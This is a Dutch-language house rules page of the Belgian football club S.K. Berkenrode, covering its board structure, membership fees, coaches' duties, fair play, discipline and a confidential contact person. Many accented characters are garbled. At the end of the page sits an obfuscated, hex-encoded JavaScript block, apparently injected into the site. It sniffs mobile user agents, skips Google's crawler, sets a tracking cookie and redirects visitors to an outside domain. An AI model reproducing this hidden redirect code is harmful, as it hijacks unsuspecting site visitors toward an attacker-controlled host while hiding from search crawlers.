Home » Huisreglement

Huisreglement

Intern reglement S.K. Berkenrode – afdeling voetbal

1. ALGEMEEN

S.K. Berkenrode afdeling Voetbal maakt deel uit van de VZW. S.K. Berkenrode (ondernemingsnummer 435.938.190).
S.K. Berkenrode is aangesloten bij de Koninklijke Vlaamse Voetbalbond (KVV) onder het BLOSO-nummer 1082 (veldvoetbal) en 5057 (zaalvoetbal).
De doelstelling van de afdeling Voetbal is de voetbalsport in al zijn facetten te promoten in een familiale sfeer. Iedereen – ook de minder begaafde voetballer – moet hierbij spelgelegenheid krijgen.
De afdeling Voetbal bestaat uit volgende onderafdelingen: veteranen-, senioren-, jeugd-, dames- en zaalvoetbal.
Het voetbalbestuur coA�rdineert het praktische en sportieve beleid van de verschillende onderafdelingen.
Het intern reglement is een onmisbaar instrument om onze vereniging met enige omvang op een degelijke wijze te besturen.
In het belang van de continuA?teit van onze club heeft het voetbalbestuur ook een disciplinaire taak wanneer het intern reglement niet nageleefd wordt.

2. ORGANISATIE

Het bestuur van onze afdeling wordt samengesteld uit de voorzitter, de ondervoorzitter, de secretaris en de afgevaardigde bestuursleden van de onderafdelingen.
Elke onderafdeling vaardigt minstens A�A�n bestuurslid af. Een bestuurslid van een bepaalde afdeling kan zich laten vervangen bij afwezigheid door een erkend lid van de betreffende afdeling op de maandelijkse vergadering.
De namen en coA�rdinaten van de bestuursleden zullen jaarlijks gepubliceerd worden in de eerste aflevering van het clubblad.

Het bestuur duidt een scheidsrechterverantwoordelijke aan. Hij behartigt de scheidsrechtersbelangen zowel binnen de club als naar het verbond.

Tijdens de vergadering van de maand april beslissen de bestuursleden of ze hun mandaat nog voor het volgende jaar verlengen. Nieuwe afgevaardigde bestuursleden worden voorgedragen aan het voetbalbestuur.
Bestuursleden engageren zich minstens voor A�A�n voetbalseizoen.
Kandidaturen voor officiA�le functies opgelegd door KVV dienen ingediend bij de voorzitter vA?A?r de maand april. Tijdens de bestuursvergadering van de maand april worden deze functies zoals jeugdverantwoordelijke, pupillenverantwoordelijke en damesverantwoordelijke bekrachtigd door het bestuur.

Het voetbalbestuur kan drie personen afvaardigen naar de maandelijkse vergadering van het overkoepelende VZW-bestuur om zijn belangen te verdedigen.

2.1. Seniorenraad

 • Is samengesteld uit afgevaardigden, trainers en/of begeleiders van de verschillende ploegen.
 • Komt maandelijks bijeen.
 • Behartigt de praktische en sportieve organisatie van de wedstrijden van senioren en veteranen.
 • Duidt afgevaardigden aan die de afdeling vertegenwoordigen in het voetbalbestuur.

2.2. Jeugdraad

 • Is samengesteld uit trainers en begeleiders van de verschillende ploegen.
 • In de afdeling zijn specifieke functies voorzien: jeugdcoA�rdinator, jeugdverantwoordelijke en pupillenverantwoordelijke.
 • Komt op vooraf afgesproken data bijeen.
 • Behartigt de praktische en sportieve organisatie van de jeugdwedstrijden.
 • Duidt afgevaardigden aan die de afdeling vertegenwoordigen in het voetbalbestuur.

2.3. Damesvoetbal

 • Is samengesteld uit afgevaardigden, trainers en/of begeleiders van de verschillende dames- en meisjesploegen.
 • Duidt afgevaardigden aan die de afdeling vertegenwoordigen in het voetbalbestuur.

2.4. Zaalvoetbal

 • Duidt afgevaardigden aan die de afdeling vertegenwoordigen in het voetbalbestuur.
 • In de afdeling zijn specifieke functies voorzien: voorzitter en secretaris. Deze functies worden opgelegd door het verbond.

3. LEDEN

Elk lid van de afdeling Voetbal wordt aangesloten bij de Koninklijke Vlaamse Voetbalbond.

Spelende leden betalen een jaarlijks lidgeld.

Alle aangesloten leden worden verondersteld het intern reglement van de afdeling voetbal te kennen en te aanvaarden. Dit reglement ligt steeds ter inzage in het clublokaal.

Elk lid verbindt zich ertoe geen enkele handeling te verrichten, die de vereniging in welke zin dan ook nadeel kan berokkenen.

Elk lid heeft het recht een wens, een suggestie of een ontevredenheid aan het bestuur kenbaar te maken. De kennisgeving gebeurt door een ondertekende brief, in een gesloten briefomslag, af te geven aan een bestuurslid. Anonieme brieven worden niet in aanmerking genomen. Het bestuur zal op een gepaste manier reageren.

OOK NOG BELANGRIJK!

Het lid geeft aan de vereniging de toelating om in het kader van de activiteiten van de vereniging afbeeldingen van hem/haar te maken alsook om die afbeeldingen te gebruiken ter promotie van de activiteiten van de vereniging. Het lid heeft evenwel het recht om indien er gewichtige redenen voorhanden zijn, deze toestemming op elk moment in te trekken. Eventuele schade die de intrekking voor de vereniging tot gevolg heeft, zal door het lid worden vergoed.a�?A�Meer info vind je op deA�website van de privacycommissie.

In dit kader van de wet op de privacy, verzoeken wij iedereen die bezwaar heeft dat er fotoa��s van hem/haar worden gepubliceerd in het Krasseleerke, de website, het prikbord a�� dit altijd te melden aan het bestuur, zodat hiermede rekening kan worden gehouden!

4. LIDGELDEN

Het bedrag van het lidgeld voor het volgende seizoen wordt vastgelegd door het overkoepelende VZW-bestuur van S.K. Berkenrode ten laatste in de maand maart van het vorige seizoen.

Lidgelden dienen principieel betaaldA�vA?A?r A�1 A�mei om te genieten van de blijverskorting op het basisbedrag.A�De club dient de verzekeringen reeds in het voorjaar te storten! De leden die hun lidgeldA�tegen 31 augustusA�nog niet betaald hebben, kunnen NIET starten aan de competitie.

VanafA�1 meiA�betalen leden het basisbedrag.
Voor leden wiens lidgeld we niet ontvangen hebbenA�tegen 31 augustus, wordt hun lidmaatschap automatisch stopgezet. Diegenen die dan alsnog beslissen om te voetballen en hun lidgeld betalen, dienen zich opnieuw in te schrijven bij de voetbalsecretaris.

Betaalde lidgelden worden onder geen beding terugbetaald.

5. BEGELEIDERS EN TRAINERS

Elke begeleider/trainer is lid van S.K. Berkenrode afdeling Voetbal.
Bij aanvaarding van zijn taak verbindt hij zich ertoe het algemeen doel van onze vereniging te volgen. De begeleider vormt een belangrijke schakel tussen spelers, ouders en club.

Het bestuur verwacht van een begeleider en in de gevallen van toepassing ook van een trainer …

 • Dat hij zijn taak ter harte neemt als “een goede huisvader”.
 • Dat hij zijn ploeg begeleidt voor, tijdens en na de wedstrijd.
 • Dat hij zorgt voor de uitnodigingen en dat iedere speler voldoende spelgelegenheid krijgt.
 • Dat hij zorgt voor de administratieve afhandeling van het wedstrijdgebeuren.
 • Dat hij de verplaatsing organiseert naar de uitwedstrijden op een verantwoorde manier.
 • Dat hij bij thuiswedstrijden zorgt voor de reiniging van de beide gebruikte kleedkamers en eventueel die van de scheidsrechter.
 • Dat hij extra aandacht heeft voor de nodige discipline in de kleedkamers zowel uit als thuis.
 • Dat hij zorgt voor de ploegopstelling in overleg met de trainer
 • Dat hij praktische afspraken maakt met de spelers om de goede werking van de ploeg te verzekeren.
 • Dat hij op regelmatige basis de vergaderingen bijwoont van zijn onderafdeling.

6. FAIR PLAY

Er wordt van de aangesloten leden verwacht dat zij een positieve ingesteldheid hebben tegen zowel de eigen club als tegen de andere clubs, evenals verdraagzaamheid tegen andere leden ongeacht de afkomst, kleur of andere bijzonderheden.

Op het veld gelden de regels van het KVV. De beslissingen van de scheidrechter, als vertegenwoordiger van het verbond, worden gerespecteerd. Indien er hieromtrent betwistingen zijn, worden ze via de begeleider aan het voetbalbestuur voorgelegd. Het bestuur beslist dan of er verdere stappen worden gezet.

7. VERPLICHTINGEN

 • Respect voor begeleiders, trainers, medewerkers en bestuursleden.
 • Respect voor de ter beschikking gestelde kledij, materialen en accommodatie.
 • Naleven van gemaakte afspraken met begeleiders en trainers.
 • Respecteren van het algemene rookverbod.
 • Als aangesloten speler tracht je aanwezig te zijn op de training, tenzij anders afgesproken met trainer en/of ploegverantwoordelijke.
 • Bij het niet kunnen aanwezig zijn op een wedstrijd waarvoor je bent uitgenodigd, dien je tijdig de begeleider te verwittigen.
 • Elke speler ouder dan 12 jaar is verplicht bij officiA�le wedstrijden zijn identiteitskaart bij zich te hebben.
 • Op en naast de voetbalterreinen van S.K. Berkenrode wordt uitsluitend Nederlands gesproken.

8. DISCIPLINAIRE MAATREGELEN

Bij onsportief gedrag op of naast het veld of het niet respecteren van het intern reglement, heeft het bestuur het recht de speler of begeleider een disciplinaire maatregel op te leggen. Hiertegen is geen beroep mogelijk.

Bij gele of rode kaarten opgelopen tijdens wedstrijden kan de club , ongeacht de straf uitgesproken door het verbond, supplementaire maatregelen treffen.
De boetes uitgesproken door KVV kunnen verhaald worden op de betrokken leden.
Ernstige inbreuken op dit reglement kunnen behandeld worden in de maandelijkse vergadering van het voetbalbestuur.

9. VERTROUWENSPERSOON

9.1.A�Wat houdt deze vertrouwenspersoon in?

Na het ondervinden van ongewenste omgangsvormen dient de vertrouwenspersoon in eerste instantie als klankbord, waarbij klachten en/of problemen onafhankelijk en op vertrouwelijk wijze kunnen worden besproken. Na een melding bij de vertrouwenspersoon vindt een eerste gesprek plaats en naar aanleiding hiervan wordt een plan van aanpak samen met de vertrouwenspersoon opgesteld. De aanpak kan bestaan uit advisering, begeleiding, bemiddeling of er kan doorverwezen worden naar andere professionele ondersteuning.

9.2. Wat zijn ongewenste omgangsvormen?

 • Agressie en geweld
 • Discriminatie
 • Pesten en/ofA�aanhoudend plagen
 • Roddelen en/of negeren
 • Verbale en/of fysieke intimidatie
 • Seksuele intimidatie

Zeker in a�?lichtea�� gevallen is het goed om eerst met degene die het ongewenste gedragA�stelt contact op te nemen en te proberen dit te bespreken. Zijn de klachten ernstiger A?f helpt het aanspreken niet, dan kan contact opgenomen worden met de vertrouwenspersoon.

9.3. Hoe kunt u in contact komen met de vertrouwensperso(o)n(en)?

Je kan Bart of Yves rechtstreeks aanspreken op de club ofA�u kan mailenA� op de volgende adressen

 • yvesdriessen@outlook.be
 • meuldermansbart@gmail.com

Er wordt dan zeker contact met u opgenomen.

 

ALLE GEVALLEN, IN HET HUIDIG REGLEMENT NIET VOORZIEN, WORDEN DOOR HET BESTUUR BESLIST.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.